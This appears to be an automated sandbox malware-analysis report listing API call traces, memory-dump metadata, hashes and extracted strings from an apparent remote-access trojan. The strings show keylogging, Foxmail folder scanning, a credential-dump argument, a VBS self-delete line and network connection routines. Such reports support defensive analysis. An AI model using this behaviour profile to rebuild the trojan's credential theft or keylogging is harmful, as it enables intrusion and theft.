• LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
• GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
• GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
• GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
• GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
• GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
• LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
• GetProcAddress.KERNEL32(00000000), ref: 0041CC11
• GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
• GetProcAddress.KERNEL32(00000000), ref: 0041CC25
• GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
• GetProcAddress.KERNEL32(00000000), ref: 0041CC39
• GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
• GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
• GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
• GetProcAddress.KERNEL32(00000000), ref: 0041CC61
• GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
• GetProcAddress.KERNEL32(00000000), ref: 0041CC75
• LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
• GetProcAddress.KERNEL32(00000000), ref: 0041CC86
• LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040E9E1), ref: 0041CC97
• GetProcAddress.KERNEL32(00000000), ref: 0041CC9A
• GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
• GetProcAddress.KERNEL32(00000000), ref: 0041CCAA
• GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
• GetProcAddress.KERNEL32(00000000), ref: 0041CCBA
• LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040E9E1), ref: 0041CCCC
• GetProcAddress.KERNEL32(00000000), ref: 0041CCCF
• LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040E9E1), ref: 0041CCDC
• GetProcAddress.KERNEL32(00000000), ref: 0041CCDF
• GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
• GetProcAddress.KERNEL32(00000000), ref: 0041CCF3
• GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
• GetProcAddress.KERNEL32(00000000), ref: 0041CD07
• LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,?,0040E9E1), ref: 0041CD19
• GetProcAddress.KERNEL32(00000000), ref: 0041CD1C
• LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040E9E1), ref: 0041CD29
• GetProcAddress.KERNEL32(00000000), ref: 0041CD2C
• LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040E9E1), ref: 0041CD39
• GetProcAddress.KERNEL32(00000000), ref: 0041CD3C
• LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040E9E1), ref: 0041CD49
• GetProcAddress.KERNEL32(00000000), ref: 0041CD4C
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: AddressProc$LibraryLoad$HandleModule
• String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
• API String ID: 4236061018-3687161714
• Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
• Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
• Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
• Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE
Uniqueness

Uniqueness Score: -1.00%

APIs
• Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414F7B
• WSAGetLastError.WS2_32(00000000,00000001), ref: 0041518C
• Sleep.KERNEL32(00000000,00000002), ref: 00415AD7
  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: Sleep$ErrorLastLocalTime
• String ID: | $%I64u$4.9.4 Pro$8SG$C:\Users\Public\Libraries\lhgtogaW.pif$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$PSG$Rmc-V052BG$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
• API String ID: 524882891-3404565747
• Opcode ID: 97aa9d39ba03ac9f0418f8daa75332d8d59cc8f14143478f3812eaa943049f73
• Instruction ID: 324fc11d7bea0fba9c16e2c7d7b547a311b01f704130931fc4cc70caa797af2d
• Opcode Fuzzy Hash: 97aa9d39ba03ac9f0418f8daa75332d8d59cc8f14143478f3812eaa943049f73
• Instruction Fuzzy Hash: 22526B31A001155ACB18F732DD96AFE73769F90344F6041BFE40A761E2EF781E858A5D
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
  • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
  • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
  • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
• Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
• Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
• Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
• DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
• DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
• DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
• Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
• Sleep.KERNEL32(00000064), ref: 00412E94
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
• String ID: /stext "$0TG$0TG$NG$NG
• API String ID: 1223786279-2576077980
• Opcode ID: b3521872b4e8ea71a5be660746f06596cfd57c138b393e402164024caafab600
• Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
• Opcode Fuzzy Hash: b3521872b4e8ea71a5be660746f06596cfd57c138b393e402164024caafab600
• Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 274C1434
  • Part of subcall function 274C10F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 274C1137
  • Part of subcall function 274C10F1: lstrcatW.KERNEL32(?,?), ref: 274C1151
  • Part of subcall function 274C10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 274C115C
  • Part of subcall function 274C10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 274C116D
  • Part of subcall function 274C10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 274C117C
  • Part of subcall function 274C10F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 274C1193
  • Part of subcall function 274C10F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 274C11D0
  • Part of subcall function 274C10F1: FindClose.KERNEL32(00000000), ref: 274C11DB
• lstrlenW.KERNEL32(?), ref: 274C14C5
• lstrlenW.KERNEL32(?), ref: 274C14E0
• lstrlenW.KERNEL32(?,?), ref: 274C150F
• lstrcatW.KERNEL32(00000000), ref: 274C1521
• lstrlenW.KERNEL32(?,?), ref: 274C1547
• lstrcatW.KERNEL32(00000000), ref: 274C1553
• lstrlenW.KERNEL32(?,?), ref: 274C1579
• lstrcatW.KERNEL32(00000000), ref: 274C1585
• lstrlenW.KERNEL32(?,?), ref: 274C15AB
• lstrcatW.KERNEL32(00000000), ref: 274C15B7
Strings
Memory Dump Source
• Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
• Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
Similarity
• API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
• String ID: )$Foxmail$ProgramFiles
• API String ID: 672098462-2938083778
• Opcode ID: 5fea99fc0cf7c31842970930a8e67004c510af118ff0daccc46befcb7895d2cb
• Instruction ID: 6ef4f6683d87900bfb5b60b5ded1d08f25d07bc999166209972b3c83cb50bf49
• Opcode Fuzzy Hash: 5fea99fc0cf7c31842970930a8e67004c510af118ff0daccc46befcb7895d2cb
• Instruction Fuzzy Hash: 6881C575A4035CA9EB20DBA1DC85FEF7379EF84B00F10159EF908E7190EAB15A84CB95
Uniqueness

Uniqueness Score: -1.00%

APIs
• Sleep.KERNEL32(00001388), ref: 0040A740
  • Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
  • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
  • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
  • Part of subcall function 0040A675: FindCloseChangeNotification.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
• CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
• GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
• SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
• PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A81E
  • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
• SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A927
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: File$AttributesCreate$Sleep$ChangeCloseDirectoryExistsFindNotificationPathSize
• String ID: 8SG$8SG$pQG$pQG$PG$PG
• API String ID: 110482706-1152054767
• Opcode ID: 28f8d381b3915e0b4d42bf4987c46cb5f57f575cbeecee27ce3475874b3df8b6
• Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
• Opcode Fuzzy Hash: 28f8d381b3915e0b4d42bf4987c46cb5f57f575cbeecee27ce3475874b3df8b6
• Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E
Uniqueness

Uniqueness Score: -1.00%

APIs
• connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
• CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
• CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
• WSAGetLastError.WS2_32 ref: 00404A21
  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: CreateEvent$ErrorLastLocalTimeconnect
• String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
• API String ID: 994465650-2151626615
• Opcode ID: 19932798ed07d1ae22d126be326c9da79f3bb29c47122c8f9a0e48a384f387e3
• Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
• Opcode Fuzzy Hash: 19932798ed07d1ae22d126be326c9da79f3bb29c47122c8f9a0e48a384f387e3
• Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

APIs
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
• SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
• FindCloseChangeNotification.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
• closesocket.WS2_32(000000FF), ref: 00404E5A
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
• SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
• SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBF
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EC4
• SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
• CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED6
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: CloseEvent$HandleObjectSingleWait$ChangeFindNotificationclosesocket
• String ID:
• API String ID: 2403171778-0
• Opcode ID: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
• Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
• Opcode Fuzzy Hash: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
• Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58
Uniqueness
• Uniqueness Score: -1.00%

APIs
• __Init_thread_footer.LIBCMT ref: 0040AD38
• Sleep.KERNEL32(000001F4), ref: 0040AD43
• GetForegroundWindow.USER32 ref: 0040AD49
• GetWindowTextLengthW.USER32(00000000), ref: 0040AD52
• GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040AD86
• Sleep.KERNEL32(000003E8), ref: 0040AE54
  • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: Window$SleepText$EventForegroundInit_thread_footerLength
• String ID: [${ User has been idle for $ minutes }$]
• API String ID: 911427763-3954389425
• Opcode ID: 597c911e194a9f8b730567eb419a0c1f24f4904ea4c2c510c10553a390452173
• Instruction ID: 3d5ee5432c15115af2c0f1375ae13a0ba8112eb59c463c5c733e63bb31497985
• Opcode Fuzzy Hash: 597c911e194a9f8b730567eb419a0c1f24f4904ea4c2c510c10553a390452173
• Instruction Fuzzy Hash: 6D51B1316043419BD314FB21D846AAE7796AB84308F50093FF586A22E2EF7C9D45C69F
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DB9A
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: LongNamePath
• String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
• API String ID: 82841172-425784914
• Opcode ID: 09899184fdc2fd004cb41772b916fb4fd362db7da6a6830410f471f7de6dd567
• Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
• Opcode Fuzzy Hash: 09899184fdc2fd004cb41772b916fb4fd362db7da6a6830410f471f7de6dd567
• Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F
Uniqueness
• Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C44D
• CloseHandle.KERNEL32(00000000), ref: 0041C459
• WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C46A
• FindCloseChangeNotification.KERNEL32(00000000), ref: 0041C477
Strings
Memory Dump Source
• Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: File$Close$ChangeCreateFindHandleNotificationPointerWrite
• String ID: hpF
• API String ID: 1087594267-151379673
• Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
• Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
• Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
• Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
  • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
  • Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
  • Part of subcall function 004135A6: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 004135E7
  • Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2
• StrToIntA.SHLWAPI(00000000,0046C9F8,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0041B33C
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: Process$CloseCurrentOpenQueryValueWow64
• String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
• API String ID: 782494840-2070987746
• Opcode ID: d33b3aadf870e2a3d5ddb7e0db64bdc32883f42ff5325d09c6e3b3a72a78e76a
• Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
• Opcode Fuzzy Hash: d33b3aadf870e2a3d5ddb7e0db64bdc32883f42ff5325d09c6e3b3a72a78e76a
• Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(274CC7DD), ref: 274CC7E6
• GetModuleHandleA.KERNEL32(?,274CC7DD), ref: 274CC838
• GetProcAddress.KERNEL32(00000000,00000000), ref: 274CC860
  • Part of subcall function 274CC803: GetProcAddress.KERNEL32(00000000,274CC7F4), ref: 274CC804
  • Part of subcall function 274CC803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,274CC7F4,274CC7DD), ref: 274CC816
  • Part of subcall function 274CC803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,274CC7F4,274CC7DD), ref: 274CC82A
Memory Dump Source
• Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
• Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
Similarity
• API ID: AddressHandleModuleProcProtectVirtual
• String ID:
• API String ID: 2099061454-0
• Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
• Instruction ID: f284350c3468f4c44a676d5d5489e5673351a030092d9639ae33423f15596774
• Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
• Instruction Fuzzy Hash: 4F01F928947241B8AB12D6740E01DFB5FD89B67A63B101B9EE240C72B3D950C706C3F6
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
• Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
• FindCloseChangeNotification.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: File$ChangeCloseCreateFindNotificationSizeSleep
• String ID: XQG
• API String ID: 4068920109-3606453820
• Opcode ID: 160462e11ef34f9525cf4e0b02e45729865881322322681307b1e70152f06eb0
• Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
• Opcode Fuzzy Hash: 160462e11ef34f9525cf4e0b02e45729865881322322681307b1e70152f06eb0
• Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(?,274CC7DD), ref: 274CC838
• GetProcAddress.KERNEL32(00000000,00000000), ref: 274CC860
  • Part of subcall function 274CC7E6: GetModuleHandleA.KERNEL32(274CC7DD), ref: 274CC7E6
  • Part of subcall function 274CC7E6: GetProcAddress.KERNEL32(00000000,274CC7F4), ref: 274CC804
  • Part of subcall function 274CC7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,274CC7F4,274CC7DD), ref: 274CC816
  • Part of subcall function 274CC7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,274CC7F4,274CC7DD), ref: 274CC82A
Memory Dump Source
• Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
• Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
Similarity
• API ID: AddressHandleModuleProcProtectVirtual
• String ID:
• API String ID: 2099061454-0
• Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
• Instruction ID: ba9a10d023c54737ac7bbe8275a284b0854af87b25cebd2f5bea34fbbb1530fc
• Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
• Instruction Fuzzy Hash: F921277944B281AFEB12CB744D00AE76FD89B53662F180A9ED140CB263D5A88746C3B6
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041C510,00000000,00000000,?), ref: 0041C430
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0040A8E7,?,00000000,00000000), ref: 0041C44D
• CloseHandle.KERNEL32(00000000,?,0040A8E7,?,00000000,00000000), ref: 0041C459
• WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A8E7,?,00000000,00000000), ref: 0041C46A
